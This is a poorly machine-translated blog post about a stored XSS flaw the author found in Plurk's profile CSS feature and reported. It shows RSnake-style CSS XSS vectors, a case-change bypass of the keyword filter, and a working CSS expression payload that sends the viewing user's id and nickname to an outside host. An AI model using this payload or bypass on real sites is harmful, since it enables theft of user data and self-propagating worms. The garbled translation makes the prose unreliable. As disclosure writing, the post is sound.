Who is watching my website? First: DOM sandbox vs cross-site scripting (XSS)

Source: External region of Alibaba Cloud

On Sunday afternoon, it was raining heavily. I couldn't go out. I started Plurk and thought of the "XSS challenge" that was launched before Plurk. I only needed to find the vulnerability, if you confirm and return to your friends, you can use the Plurk hacker chapter. Before that, I quickly submitted html "> I crawled the demo and returned the demo. (You don't have to worry about it. Of course you didn't actually use it)

I opened the timer and didn't have any tools. I just played it on the timer with my hands, find a stored XSS (stored cross-site scripting, because the information first stored in the stored type, for example, after the data is retrieved, causes attacks, stored XSS), installed a short poc program, confirmed that the cookie can be stolen, and then published a crawling poc program. Originally, I wanted to immediately send the poc program to Plurk for a response, but I felt that there was nothing new about these things. But what kind of demo is coming back?

At this time, I suddenly thought of the previous irc machine man. Well, I just wanted to say hello to the machine man like irc. Then I thought about irc's time. I can still use the plug-in directly on the plug-in, as long as I have logged on to the plug-in, I use IE (<= 7) to ask my Plurk face, the bot will automatically say hello to you (it will not steal cookies ). After sending the response regular expression to Plurk, It's really fast. In less than an hour, I received a reply and changed it in less than a day. This speed is really faster than other websites. I asked them if they could write a blog. Plurk says it's okay. It's nice to fix it anyway!

Throughout the entire process, I always thought of the concept of "DOM-based sandboxing. XSS (cross-site scripting, cross-site scripting vulnerability) should not be so protected; the problem mainly lies in the fact that at the beginning, the W3C and traditional library decided to define various rules, and there was really little need to test the information security. Maybe this makes the rapid growth of Web and Web 2.0 (very limited, very good, very good )! In this case, DOM-based sandboxing (DBS) is the most intuitive solution. Let's take a look at this vulnerability.

[XSS weak point samples]

One of the most fascinating features of upstreaming is the ability to render (or upload) CSS by yourself so that everyone can have their own upstreaming faces. Click "edit" next to "Profile", and click "Customize profile" to fill in CSS. The last time I returned a worm vulnerability, I helped my friend modify the code, connected to the Plurk API, and noticed the vulnerability. At that time, there was no Alibaba Cloud player interface. During this time, wow can write CSS by itself, so this function is likely to have a vulnerability. XSS attack points in CSS can be used to test the XSS Cheat Sheet of RSnake. For example, IE (<= 7) has two types:

1. javascript rows can be written in CSS. Examples include:

body {background-image: url("javascript:alert(XSS)");}

2. The expression is used in CSS to generate a javascript response line, for example

body {background-image: expression(alert("XSS"));}

(Example 1)

We will analyze how to conduct attack detection. There are many ways to set css in Html; they can be post-end programs, and they can be hidden in HTML. They can be front-end javascript with document. the write () method can also be used to create a new DOM element in front-end javascript. Let's take a look at the source tracing of Plurk. We can see the following production methods:

B = document.createElement("link");B.setAttribute("rel", "stylesheet");B.setAttribute("type", "text/css");document.getElementsByTagName("head")[0].appendChild(B);

(Program 1)

XSS Cheat Sheet with the root certificate RSnake. Attack attack points (1) in (Example 1) are only valid for IE6. We should first select attack points (2) "expression" is available. Enter the following information in the interface:

body {background-image: expression(alert("XSS"));}

(Procedure 2)

(Dark: (1) Is it true only for IE6? ;))

When you press Save and update, there is a limit. CSS cannot contain expressions, javascript, @ import, and other keywords.

Well, it's probably because the regular expression has passed the limit! Change "expression" 「EWhat about xpression? Umm... the result is passed... it turns out that I didn't have the problem of checking the size of my questions during the past few days. So a small loss may cause a memory-type XSS, in fact, the MySpace (Samy) three years ago and the recent Twitter (Mikeyy) the crawling (here, here, and here) uses the stored XSS in the user profile. As long as the infected user's face is accessed, it will be infected. Taking MySpace as an example, at that time, both (1) and (2) attack points existed, and Samy worm used these two attack points at the same time.

Next we will use cssEXpression:

body {background-color: Expression( if ( (typeof doneonce == undefined) ) { void( doneonce = {testit: function () {dddd = new Image(16,16);dddd.src = "http://553lab.org/plurk/hello.php?x=[" + GLOBAL.session_user.uid + "][" + GLOBAL.session_user.nick_name+"]";}} ) + doneonce.testit() } );}

(Program 3)

In the above program, we use a token to bring it to the body.EXpression uses javascript to generate an image. Its url is: http://553lab.org/plurk/hello.php? X = [user_id] [nick_name]. The program will send IE a GET to our hello bot (hello. php), with two numbers taken separately from the Plurk javascript program: GLOBAL. session_user.uid is the current user id, while GLOBAL. session_user.nick_name is the current user's nick. Why not use hello. php? X = user_id & y = nick format? Since Plurk converts "&" htmlencode into "& amp;", it simply uses only one batch of "x", and the data is separated.

The remote hello. php program is as follows: